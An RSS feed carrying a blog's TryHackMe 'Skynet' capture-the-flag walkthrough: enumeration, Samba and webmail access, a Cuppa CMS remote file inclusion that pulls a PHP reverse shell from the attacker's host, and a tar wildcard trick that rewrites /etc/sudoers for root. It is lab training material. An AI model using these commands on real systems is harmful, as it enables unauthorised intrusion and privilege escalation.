<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>TryHackMe on Site de Nemo</title><link>https://nemodzilla.xyz/categories/tryhackme/</link><description>Recent content in TryHackMe on Site de Nemo</description><generator>Hugo -- gohugo.io</generator><language>fr</language><lastBuildDate>Thu, 18 May 2023 00:00:00 +0000</lastBuildDate><atom:link href="https://nemodzilla.xyz/categories/tryhackme/index.xml" rel="self" type="application/rss+xml"/><item><title>Skynet [Unlocked]</title><link>https://nemodzilla.xyz/p/tryhackme/</link><pubDate>Thu, 18 May 2023 00:00:00 +0000</pubDate><guid>https://nemodzilla.xyz/p/tryhackme/</guid><description>&lt;img src="https://nemodzilla.xyz/p/tryhackme/assets/skynet.jpeg" alt="Featured image of post Skynet [Unlocked]" /&gt;&lt;p&gt;&lt;a class="link" href="https://tryhackme.com/room/skynet" target="_blank" rel="noopener"
&gt;Link to the machine&lt;/a&gt;&lt;/p&gt;
&lt;h2 id="Answer-1"&gt;Answer 1
&lt;/h2&gt;&lt;p&gt;My target IP : &lt;strong&gt;10.10.84.89&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;We start by simply launching an nmap scan.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;
&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; nmap -sC -sV -oN nmap -O -T4 &lt;span class="o"&gt;[&lt;/span&gt;@Target_IP&lt;span class="o"&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;p&gt;&lt;img src="https://nemodzilla.xyz/p/tryhackme/assets/1.png"
width="1800"
height="927"
srcset="https://nemodzilla.xyz/p/tryhackme/assets/1_hu_462b2ae288d5fa91.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/1_hu_818367ebb14ac922.png 1024w"
loading="lazy"
alt="Image 1"
class="gallery-image"
data-flex-grow="194"
data-flex-basis="466px"
&gt;&lt;/p&gt;
&lt;p&gt;We can see that 6 services are open, including port 80. We navigate to a web browser to see what it is.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://nemodzilla.xyz/p/tryhackme/assets/2.png"
width="1476"
height="961"
srcset="https://nemodzilla.xyz/p/tryhackme/assets/2_hu_3601d948bfedac44.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/2_hu_b0bc4c4a2d191379.png 1024w"
loading="lazy"
alt="Image 2"
class="gallery-image"
data-flex-grow="153"
data-flex-basis="368px"
&gt;&lt;/p&gt;
&lt;p&gt;We launch gobuster to discover hidden files or directories.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://nemodzilla.xyz/p/tryhackme/assets/3.png"
width="1489"
height="897"
srcset="https://nemodzilla.xyz/p/tryhackme/assets/3_hu_80803d574b416843.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/3_hu_eb94fca8bf6ebe45.png 1024w"
loading="lazy"
alt="Image 3"
class="gallery-image"
data-flex-grow="165"
data-flex-basis="398px"
&gt;&lt;/p&gt;
&lt;p&gt;The &amp;ldquo;admin&amp;rdquo; directory is forbidden, so we focus on the &amp;ldquo;squirrelmail&amp;rdquo; directory.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://nemodzilla.xyz/p/tryhackme/assets/4.png"
width="1494"
height="864"
srcset="https://nemodzilla.xyz/p/tryhackme/assets/4_hu_3eaea4b024a5a594.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/4_hu_e7f5f5610432119d.png 1024w"
loading="lazy"
alt="Image 4"
class="gallery-image"
data-flex-grow="172"
data-flex-basis="415px"
&gt;&lt;/p&gt;
&lt;p&gt;We could attempt a brute force attack, but for now, I prefer to revisit the information provided by nmap, which indicates the presence of a Samba share. To exploit it, we can use the tool &amp;ldquo;enum4linux.&amp;rdquo;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;
&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; enum4linux 10.10.84.89
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;p&gt;&lt;img src="https://nemodzilla.xyz/p/tryhackme/assets/5.png"
width="1504"
height="913"
srcset="https://nemodzilla.xyz/p/tryhackme/assets/5_hu_e3bff40355e27219.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/5_hu_28126db872dd632b.png 1024w"
loading="lazy"
alt="Image 5"
class="gallery-image"
data-flex-grow="164"
data-flex-basis="395px"
&gt;&lt;/p&gt;
&lt;p&gt;Bingo! We learn two things: anonymous account usage is allowed, and there is also a share named &amp;ldquo;&lt;strong&gt;milesdyson&lt;/strong&gt;.&amp;rdquo;&lt;/p&gt;
&lt;p&gt;Let&amp;rsquo;s connect anonymously and download the content of the &amp;ldquo;milesdyson&amp;rdquo; share.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://nemodzilla.xyz/p/tryhackme/assets/6.png"
width="1504"
height="478"
srcset="https://nemodzilla.xyz/p/tryhackme/assets/6_hu_f51ed86cf142903.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/6_hu_cbd971211b8e630f.png 1024w"
loading="lazy"
alt="Image 6"
class="gallery-image"
data-flex-grow="314"
data-flex-basis="755px"
&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src="https://nemodzilla.xyz/p/tryhackme/assets/7.png"
width="1507"
height="88"
srcset="https://nemodzilla.xyz/p/tryhackme/assets/7_hu_3c69956945f7ef74.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/7_hu_aba4490e4b9a5375.png 1024w"
loading="lazy"
alt="Image 7"
class="gallery-image"
data-flex-grow="1712"
data-flex-basis="4110px"
&gt;&lt;/p&gt;
&lt;p&gt;We find that &amp;ldquo;log1.txt&amp;rdquo; is a password list.&lt;/p&gt;
&lt;p&gt;At this stage, we have a list of passwords and a possible username: milesdyson. We try to connect to the mail server using the passwords from this list and the username milesdyson. Success! It was quite fast.&lt;/p&gt;
&lt;h2 id="Answer-2"&gt;Answer 2
&lt;/h2&gt;&lt;p&gt;&lt;img src="https://nemodzilla.xyz/p/tryhackme/assets/8.png"
width="1507"
height="814"
srcset="https://nemodzilla.xyz/p/tryhackme/assets/8_hu_39576098267d1f98.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/8_hu_918dfb01c244bffb.png 1024w"
loading="lazy"
alt="Image 8"
class="gallery-image"
data-flex-grow="185"
data-flex-basis="444px"
&gt;&lt;/p&gt;
&lt;p&gt;In one of the emails, we find the new password for this user, allowing us to connect to their share.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://nemodzilla.xyz/p/tryhackme/assets/9.png"
width="1504"
height="457"
srcset="https://nemodzilla.xyz/p/tryhackme/assets/9_hu_65961554eb2b1917.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/9_hu_84f443e91cc895fd.png 1024w"
loading="lazy"
alt="Image 9"
class="gallery-image"
data-flex-grow="329"
data-flex-basis="789px"
&gt;&lt;/p&gt;
&lt;p&gt;In the &amp;ldquo;notes&amp;rdquo; directory, we find the file &amp;ldquo;important.txt.&amp;rdquo;&lt;/p&gt;
&lt;p&gt;&lt;img src="https://nemodzilla.xyz/p/tryhackme/assets/10.png"
width="1413"
height="396"
srcset="https://nemodzilla.xyz/p/tryhackme/assets/10_hu_dc25aa778590e326.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/10_hu_d8b629ec5370e5a6.png 1024w"
loading="lazy"
alt="Image 10"
class="gallery-image"
data-flex-grow="356"
data-flex-basis="856px"
&gt;&lt;/p&gt;
&lt;p&gt;The document mentions a CMS. Let&amp;rsquo;s see how it looks in the browser.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://nemodzilla.xyz/p/tryhackme/assets/11.png"
width="937"
height="841"
srcset="https://nemodzilla.xyz/p/tryhackme/assets/11_hu_7de4864dad1844b6.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/11_hu_7f1100cffbb82a7.png 1024w"
loading="lazy"
alt="Image 11"
class="gallery-image"
data-flex-grow="111"
data-flex-basis="267px"
&gt;&lt;/p&gt;
&lt;p&gt;Here is our hidden directory.&lt;/p&gt;
&lt;h2 id="Answer-3"&gt;Answer 3
&lt;/h2&gt;&lt;p&gt;Not knowing what to do at this stage, I relaunch gobuster on this new address.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://nemodzilla.xyz/p/tryhackme/assets/12.png"
width="1506"
height="505"
srcset="https://nemodzilla.xyz/p/tryhackme/assets/12_hu_c6c20df19e88fe95.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/12_hu_6cbe6060442aa30a.png 1024w"
loading="lazy"
alt="Image 12"
class="gallery-image"
data-flex-grow="298"
data-flex-basis="715px"
&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src="https://nemodzilla.xyz/p/tryhackme/assets/13.png"
width="1504"
height="1083"
srcset="https://nemodzilla.xyz/p/tryhackme/assets/13_hu_620eb304527fd8bf.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/13_hu_8fa1e020b2bd1342.png 1024w"
loading="lazy"
alt="Image 13"
class="gallery-image"
data-flex-grow="138"
data-flex-basis="333px"
&gt;&lt;/p&gt;
&lt;p&gt;We get something called Cuppa CMS.
Let&amp;rsquo;s search if there is a known vulnerability.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://nemodzilla.xyz/p/tryhackme/assets/14.png"
width="1504"
height="219"
srcset="https://nemodzilla.xyz/p/tryhackme/assets/14_hu_e551dd67c2e380c1.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/14_hu_3ec60b24a60cba07.png 1024w"
loading="lazy"
alt="Image 14"
class="gallery-image"
data-flex-grow="686"
data-flex-basis="1648px"
&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src="https://nemodzilla.xyz/p/tryhackme/assets/15.png"
width="1504"
height="271"
srcset="https://nemodzilla.xyz/p/tryhackme/assets/15_hu_adbc35aff68a5169.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/15_hu_f028668b098f0b77.png 1024w"
loading="lazy"
alt="Image 15"
class="gallery-image"
data-flex-grow="554"
data-flex-basis="1331px"
&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Remote File Inclusion, let&amp;rsquo;s try to inject a reverse shell.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="Answer-4"&gt;Answer 4
&lt;/h2&gt;&lt;p&gt;I&amp;rsquo;ll use the one from &lt;a class="link" href="https://github.com/pentestmonkey/php-reverse-shell" target="_blank" rel="noopener"
&gt;pentestmonkey&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;My target IP : &lt;strong&gt;10.10.220.244&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Remember to modify the address in the script with your own machine&amp;rsquo;s :&lt;/p&gt;
&lt;p&gt;&lt;img src="https://nemodzilla.xyz/p/tryhackme/assets/16.png"
width="1306"
height="586"
srcset="https://nemodzilla.xyz/p/tryhackme/assets/16_hu_4e09968ab185a3df.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/16_hu_d0c3d9610d4858eb.png 1024w"
loading="lazy"
alt="Image 16"
class="gallery-image"
data-flex-grow="222"
data-flex-basis="534px"
&gt;&lt;/p&gt;
&lt;p&gt;In one terminal, we start the Python server where our script is located.&lt;/p&gt;
&lt;p&gt;In another terminal, we listen on port 1234 (if you haven&amp;rsquo;t changed it):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;
&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; nc -lvnp &lt;span class="m"&gt;1234&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;p&gt;So in a shell :&lt;/p&gt;
&lt;p&gt;&lt;img src="https://nemodzilla.xyz/p/tryhackme/assets/17.png"
width="858"
height="306"
srcset="https://nemodzilla.xyz/p/tryhackme/assets/17_hu_b4e3f2c34286b2eb.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/17_hu_77db4bd6ad46ebf9.png 1024w"
loading="lazy"
alt="Image 17"
class="gallery-image"
data-flex-grow="280"
data-flex-basis="672px"
&gt;&lt;/p&gt;
&lt;p&gt;And in another :&lt;/p&gt;
&lt;p&gt;&lt;img src="https://nemodzilla.xyz/p/tryhackme/assets/18.png"
width="1506"
height="240"
srcset="https://nemodzilla.xyz/p/tryhackme/assets/18_hu_16def1f430ed7224.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/18_hu_7bc02f57c693a145.png 1024w"
loading="lazy"
alt="Image 18"
class="gallery-image"
data-flex-grow="627"
data-flex-basis="1506px"
&gt;&lt;/p&gt;
&lt;p&gt;Then, in the web browser:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;
&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-http" data-lang="http"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="err"&gt; http://10.10.84.89/[NAME OF HIDDEN DIRECTORY]/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.220.244:8000/php-reverse-shell.php
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;p&gt;&lt;img src="https://nemodzilla.xyz/p/tryhackme/assets/19.png"
width="1504"
height="325"
srcset="https://nemodzilla.xyz/p/tryhackme/assets/19_hu_ec865dac3c4ee34d.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/19_hu_f8aa341ae9b7d228.png 1024w"
loading="lazy"
alt="Image 19"
class="gallery-image"
data-flex-grow="462"
data-flex-basis="1110px"
&gt;&lt;/p&gt;
&lt;p&gt;The reverse shell is in place!&lt;/p&gt;
&lt;p&gt;&lt;img src="https://nemodzilla.xyz/p/tryhackme/assets/20.png"
width="1507"
height="145"
srcset="https://nemodzilla.xyz/p/tryhackme/assets/20_hu_c8b4904ad5b4dcd9.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/20_hu_d5c0a48c0209c676.png 1024w"
loading="lazy"
alt="Image 20"
class="gallery-image"
data-flex-grow="1039"
data-flex-basis="2494px"
&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src="https://nemodzilla.xyz/p/tryhackme/assets/21.png"
width="1504"
height="202"
srcset="https://nemodzilla.xyz/p/tryhackme/assets/21_hu_c6c4b7cafb3b5845.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/21_hu_6c9423bec607d109.png 1024w"
loading="lazy"
alt="Image 21"
class="gallery-image"
data-flex-grow="744"
data-flex-basis="1786px"
&gt;&lt;/p&gt;
&lt;h2 id="Answer-5"&gt;Answer 5
&lt;/h2&gt;&lt;p&gt;Now it&amp;rsquo;s time to escalate privileges.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://nemodzilla.xyz/p/tryhackme/assets/22.png"
width="1501"
height="313"
srcset="https://nemodzilla.xyz/p/tryhackme/assets/22_hu_ae37690c6336140a.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/22_hu_f365ea4584df7a27.png 1024w"
loading="lazy"
alt="Image 22"
class="gallery-image"
data-flex-grow="479"
data-flex-basis="1150px"
&gt;&lt;/p&gt;
&lt;p&gt;I can&amp;rsquo;t use the &amp;ldquo;sudo -l&amp;rdquo; command, so I decide to take a look at the crontab, and there we find an interesting file.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://nemodzilla.xyz/p/tryhackme/assets/23.png"
width="1506"
height="739"
srcset="https://nemodzilla.xyz/p/tryhackme/assets/23_hu_991893e9f877a864.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/23_hu_cfba0a65504b84e7.png 1024w"
loading="lazy"
alt="Image 23"
class="gallery-image"
data-flex-grow="203"
data-flex-basis="489px"
&gt;&lt;/p&gt;
&lt;p&gt;I&amp;rsquo;ll check &lt;a class="link" href="https://gtfobins.github.io/gtfobins/tar/" target="_blank" rel="noopener"
&gt;GTFOBins&lt;/a&gt; to see if we can do something with that &amp;ldquo;tar&amp;rdquo; command executed as root.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://nemodzilla.xyz/p/tryhackme/assets/24.png"
width="1291"
height="418"
srcset="https://nemodzilla.xyz/p/tryhackme/assets/24_hu_f21d07efad75a7ec.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/24_hu_a595b0d6c0d7b863.png 1024w"
loading="lazy"
alt="Image 24"
class="gallery-image"
data-flex-grow="308"
data-flex-basis="741px"
&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;
&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1
&lt;/span&gt;&lt;span class="lnt"&gt;2
&lt;/span&gt;&lt;span class="lnt"&gt;3
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;echo &amp;#34;www-data ALL=(root) NOPASSWD: ALL&amp;#34; &amp;gt; /etc/sudoers&amp;#39;&lt;/span&gt; &amp;gt; privesc.sh
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;/var/www/html&amp;#34;&lt;/span&gt; &amp;gt; &lt;span class="s2"&gt;&amp;#34;--checkpoint-action=exec=sh privesc.sh&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;/var/www/html&amp;#34;&lt;/span&gt; &amp;gt; --checkpoint&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="m"&gt;1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;p&gt;&lt;img src="https://nemodzilla.xyz/p/tryhackme/assets/25.png"
width="1504"
height="238"
srcset="https://nemodzilla.xyz/p/tryhackme/assets/25_hu_55d9c47048593c51.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/25_hu_5517414ab73cb517.png 1024w"
loading="lazy"
alt="Image 25"
class="gallery-image"
data-flex-grow="631"
data-flex-basis="1516px"
&gt;&lt;/p&gt;
&lt;p&gt;After 1 minute :&lt;/p&gt;
&lt;p&gt;&lt;img src="https://nemodzilla.xyz/p/tryhackme/assets/26.png"
width="1503"
height="226"
srcset="https://nemodzilla.xyz/p/tryhackme/assets/26_hu_8350583a019b0443.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/26_hu_6fcb20d27fdf47d0.png 1024w"
loading="lazy"
alt="Image 26"
class="gallery-image"
data-flex-grow="665"
data-flex-basis="1596px"
&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src="https://nemodzilla.xyz/p/tryhackme/assets/27.png"
width="1501"
height="198"
srcset="https://nemodzilla.xyz/p/tryhackme/assets/27_hu_ffb1140bab4eed29.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/27_hu_1333eeba18b4b3ab.png 1024w"
loading="lazy"
alt="Image 27"
class="gallery-image"
data-flex-grow="758"
data-flex-basis="1819px"
&gt;&lt;/p&gt;</description></item></channel></rss>